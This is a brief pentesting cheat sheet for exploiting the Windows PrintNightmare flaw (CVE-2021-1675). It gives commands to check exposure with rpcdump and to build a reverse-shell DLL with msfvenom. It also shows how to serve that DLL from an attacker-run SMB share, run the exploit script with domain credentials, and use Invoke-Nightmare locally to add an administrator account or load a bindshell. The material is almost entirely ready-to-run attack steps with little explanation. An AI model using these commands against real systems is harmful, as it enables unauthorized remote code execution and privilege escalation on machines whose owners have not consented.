CVE-2021-1675 - PrintNightmare
To check if it's vulnerable,
Using impackets rpcdump.py,
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
Remote exploitation,
Generate a dll,
msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll
Serve the dll with smbserver
impacket-smbserver -debug morph3 . -smb2support
Exploiting it,
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'
Local exploitation,
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
or
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Last updated